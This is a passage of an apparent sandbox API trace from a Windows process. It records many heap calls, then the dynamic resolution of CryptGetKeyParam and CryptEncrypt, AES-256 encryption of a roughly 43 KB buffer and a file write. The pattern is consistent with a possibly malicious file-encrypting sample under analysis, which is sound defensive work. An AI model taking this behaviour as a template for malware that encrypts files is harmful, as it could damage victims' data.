hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0098.316] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0098.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0098.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0098.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0098.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0098.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0098.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0098.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0098.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0098.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0098.320] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0098.321] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2790, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2790*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.323] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.323] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.324] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0098.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0098.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0098.325] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.325] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.325] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca988, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.325] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xa962, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xa970) returned 1 [0098.325] CharLowerBuffW (in: lpsz="byte[43377]", cchLength=0xb | out: lpsz="byte[43377]") returned 0xb [0098.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca880, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.326] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4535c60*, pdwDataLen=0x144e538*=0xa962, dwBufLen=0xa970 | out: pbData=0x4535c60*, pdwDataLen=0x144e538*=0xa970) returned 1 [0098.326] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.327] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xa970, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xa970, lpOverlapped=0x0) returned 1 [0098.329] CharUpperBuffW (in: 